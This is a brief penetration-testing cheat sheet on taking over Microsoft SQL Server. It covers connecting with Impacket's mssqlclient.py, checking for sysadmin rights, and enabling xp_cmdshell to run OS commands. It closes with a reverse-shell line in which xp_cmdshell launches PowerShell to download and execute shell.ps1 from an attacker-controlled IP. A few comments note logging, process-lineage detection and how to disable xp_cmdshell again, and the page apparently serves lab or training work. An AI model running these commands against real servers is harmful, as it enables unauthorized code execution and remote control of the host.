#
mssql
#
connecting to mssql console
mssqlclient.py is part of the Impacket suite: https://github.com/SecureAuthCorp/impacket
python3 mssqlclient.py DOMAIN/sql_svc@10.10.10.27 -windows-auth
python3 mssqlclient.py -port 27900 user:password@10.1.1.1
#
Getting Shell
Check whether the current login is a member of the sysadmin server role (returns 1 if it is, 0 if not)
SELECT IS_SRVROLEMEMBER('sysadmin');
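Enable xp_cmdshell (disabled by default; it is an advanced option, so 'Show Advanced Options' has to be turned on first)
Each sp_configure change is written to the SQL Server error log, so this step is visible to anyone monitoring that log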
-- xp_cmdshell is an advanced option, so advanced options must be shown
-- before sp_configure will accept it.
EXEC sp_configure 'Show Advanced Options', 1;
-- RECONFIGURE applies the pending value set by sp_configure.
reconfigure;
-- With no arguments, sp_configure lists the configuration options and their values.
sp_configure;
-- Turns on xp_cmdshell, which is disabled by default.
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
-- Runs one command through xp_cmdshell; whoami shows which Windows account
-- the commands execute as.
xp_cmdshell "whoami"
-- NOTE(review): nothing on this page turns the option back off. When testing is
-- finished, restore the default with: EXEC sp_configure 'xp_cmdshell', 0; reconfigure;
#
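Set up reverse shell
xp_cmdshell runs the command as a child of the SQL Server service process, under the service account; sqlservr.exe spawning cmd.exe or powershell.exe is the process-lineage signal to alert on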
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.15/shell.ps1\");"